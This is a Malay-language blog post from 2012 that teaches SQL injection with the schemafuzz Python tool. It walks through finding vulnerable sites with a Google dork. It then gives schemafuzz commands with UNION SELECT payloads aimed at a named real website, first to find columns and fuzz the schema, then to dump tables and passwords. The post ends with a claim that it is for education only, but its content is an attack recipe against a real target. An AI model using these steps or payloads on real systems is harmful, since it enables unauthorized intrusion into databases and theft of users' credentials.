ads

Tuesday 5 June 2012

SCHEMAFUZZ tutorial

sql injection
schemafuzz ditulis dalam coding python oleh darkc0de crew.. tool ini berfungsi untuk melakukan sql injection terhadap website yang vuln atau dalam kata lainnya mempunyai kelemahan SQL..
 
 
pertama skali, kita hendaklah mencari website yang vul dengan 
menggunakan google dork. 


contoh: http://www.seaofstories.com/title.php?id=5193



sql injection






schemafuzz.py -u "http://www.seaofstories.com/title.php?id=5193" --findcol






[--findcol digunakan untuk mencari column dan magic number]














schemafuzz.py -u "http://www.seaofstories.com/title.php?id=5193+AND+1=2+UNION+SELECT+0,


darkc0de,2,3" --fuzz






[--fuzz digunakan untuk mencari database,table dan column..]












setelah table dan column dijumpai.. kita akan dump data tersebut..






schemafuzz.py -u "http://www.seaofstories.com/title.php?id=5193+AND+1=2+


UNION+SELECT+0,darkc0de,2,3" --dump -D databesename -T tablename -C columnname


 





dump password






 


schemafuzz code 


 


TUTORIAL INI HANYALAH PROSES PENDIDIKAN SAHAJA, SEBARANG PENYALAHGUNAAN ADALAH DILARANG!!


















at





















Labels:
,
,
,

















No comments:















Post a Comment


















        

      









Subscribe to:
Post Comments (Atom)







Related Posts Plugin for WordPress, Blogger...